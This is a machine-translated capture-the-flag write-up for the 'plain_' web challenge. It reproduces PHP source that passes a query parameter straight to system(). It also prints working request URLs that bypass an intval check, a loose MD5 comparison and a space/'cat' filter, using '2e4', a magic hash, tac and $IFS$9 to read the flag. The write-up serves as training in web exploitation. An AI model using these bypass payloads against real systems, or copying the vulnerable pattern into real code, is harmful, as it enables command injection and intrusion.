[wustctf2020] plain_ WP

List of topics

analysis

• Open questions , except hack me, No available information , View source code
• Although there is a problem with coding , But I still found this utilization point bot, The thought of robots.txt Crawler rules for websites

robots.txt Put it under the root directory of the website . Based on this file, the crawler decides which pages under the website are authorized to crawl

• robots.txt
  It means to any reptile , Prohibit its access to /fAke_f1agggg.php A file in a directory
  But for this hint , We obviously want to visit to see if there is any available information
• /fAke_f1agggg.php
  
  I'm at a loss here , Looking at the source code is nothing
  

obtain flag

• Try to grab the bag , Find valid information in the response header
• /fl4g.php

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
    
        echo " I inadvertently looked at my Rolex ,  I don't want to see the time ,  Just want to inadvertently ,  Let you know I'm better than you .</br>";
    }else{
    
        die(" Money can't solve the essential problem of the poor ");
    }
}else{
    
    die(" Go to Africa ");
}
//level 2
if (isset($_GET['md5'])){
    
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo " Think of this CTFer Get flag after ,  grateful ,  Run to Donglan bank ,  Find a restaurant ,  Get the chef out of here ,  Stir fry two special dishes by yourself ,  Pour a glass of white wine in bulk ,  How to get rich ,  Don't be a little violent .</br>";
   else
       die(" I quickly called my fair weather friend ,  He made a phone call ,  Put his family in Africa ");
}else{
    
    die(" Go to Africa ");
}

//get flag
if (isset($_GET['get_flag'])){
    
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
    
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo " Think of it here. ,  I'm full and happy ,  The happiness of rich people is often so simple and unadorned ,  And it's boring .</br>";
        system($get_flag);
    }else{
    
        die(" It's almost Africa ");
    }
}else{
    
    die(" Go to Africa ");
}
?>
 Go to Africa 

It's harder to appear , Start code audit

title Level 1

• intval() Function to get the integer value of a variable .
• (intval($num) < 2020 && intval($num + 1) > 2021)
  That is to say, let the incoming num Rounded value is less than 2020, Add 1 After taking an integer, it should be greater than 2021
  
  According to this inspiration , We can try the following
• But I don't know why , My compiler does not implement this difference , So we pass parameters directly into the title , Check

 <?php
  echo intval('2e4');
  echo intval(2e4);
  echo intval('2e4'+1);
  echo intval(2e4+1);
  echo intval(1e10);                    
  echo intval('1e10');
  ?>

• http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=%272e4%27
  Money can't solve the essential problem of the poor
• http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4
  I inadvertently looked at my Rolex , I don't want to see the time , Just want to inadvertently , Let you know I'm better than you .
  Bypass success , And it can be concluded that , The passed in parameters will be automatically converted into strings

Level 2

• md5() Function to evaluate the MD5 hash .

• ($md5==md5($md5))
  That is to say, you need to pass in the parameter and its MD5 Hash weak comparison values are equal
  md5(0e215962017,32) = 0e291242476940776845150308577824
  Pass in the parameter
  http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017

• Bypass success

get flag

if(!strstr($get_flag," ")){
    
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo " Think of it here. ,  I'm full and happy ,  The happiness of rich people is often so simple and unadorned ,  And it's boring .</br>";
        system($get_flag); 

-strstr(str1,str2) Function is used to determine the string str2 Whether it is str1 The string of . If it is , Then the function returns str1 String from str2 Where the first occurrence begins str1 a null-terminated string ; otherwise , return NULL.

• str_ireplace() Function to replace some characters in a string （ Case insensitive ）.
• So in get flag There are... In this step 3 Requirements

  There can be no spaces in parameters 		
  If there is... In the parameter cat Will be replaced by wctf2020 
  Parameters are executed as system commands 

• http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php？num=2e4&md5=0e215962017&get_flag=ls
• 
  -http://99284f97-7851-47d5-be09-dc6cb3119651.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
  tac Bypass cat $IFS$9 Around the space
• flag{6c1c57d3-5462-42d3-be85-df3998d042c7}